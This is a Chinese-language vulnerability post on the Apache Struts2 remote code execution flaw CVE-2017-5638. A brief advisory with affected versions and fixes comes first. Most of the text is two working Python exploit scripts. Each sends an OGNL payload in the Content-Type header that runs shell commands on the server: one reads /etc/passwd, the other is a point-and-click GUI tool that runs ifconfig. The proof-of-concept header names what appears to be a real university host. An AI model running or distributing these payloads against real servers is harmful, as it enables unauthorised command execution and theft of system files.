释放双眼,带上耳机,听听看~!
漏洞编号:CVE-2017-5638Struts2远程代码执行漏洞漏洞名称: 基于 Jakartaplugin插件的Struts远程代码执行漏洞 漏洞类型:远程代码执行漏洞危险等级:高危利用条件:Struts2在受影响版本内,并包含Commons-FileUpload、Co
漏洞编号:CVE-2017-5638 Struts2远程代码执行漏洞
漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞
漏洞类型: 远程代码执行漏洞
危险等级: 高危
利用条件: Struts2在受影响版本内,并包含Commons-FileUpload、Commons-IO库
受影响版本: Struts 2.3.5 – Struts 2.3.31, Struts 2.5 – Struts 2.5.10
漏洞描述:
受影响的Struts2版本在包含Commons-FileUpload、Commons-IO库时,该漏洞能够通过构造恶意的Content-Type值来执行任意代码。如果Content-Type值无效,则会抛出异常,并向用户显示错误消息,从而能够进一步获取服务器权限。
修复建议:
安装官方补丁升级到最新版本:Struts 2.3.32 or Struts 2.5.10.1
临时修复方法:Struts 2默认使用Jakarta的Common-FileUpload文件上传解析器,修改上传解析器为cos或pell。
POC:
#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
header1 ={
"Host":"alumnus.shu.edu.cn",
"Connection":"keep-alive",
"Refer":"alumnus.shu.edu.cn",
"Accept":"*/*",
"X-Requested-With":"XMLHttpRequest",
"Accept-Encoding":"deflate",
"Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
}
def poc():
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header["Content-Type"]='''%{(#nike='multipart/form-data').
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
(#_memberAccess?(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').
(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
(#ros.flush())}'''
request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
response = urllib2.urlopen(request)
print response.read()
poc()EXP:
#coding:utf-8
import urllib2
from Tkinter import *
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
class START():
def __init__(self,root):
self.root=root
self.show_W_Text = Text()
self.show_url_ed = Label(root, text="str2")
self.edit_url = Entry(root, text="输入地址")
self.butt_whois = Button(root, text="kill",command=self.poc)
self.show_url_ed.pack()
self.edit_url.pack()
self.butt_whois.pack()
self.show_W_Text.pack()
def poc(self):
w_url = self.edit_url.get()
text = self.show_W_Text
register_openers()
datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
header[
"User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
header[
"Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
request = urllib2.Request(w_url, datagen, headers=header)
response = urllib2.urlopen(request).read()
text.insert(1.0, response)
if __name__ == '__main__':
root=Tk()
root.title("str2 045")
motion=START(root)
mainloop()
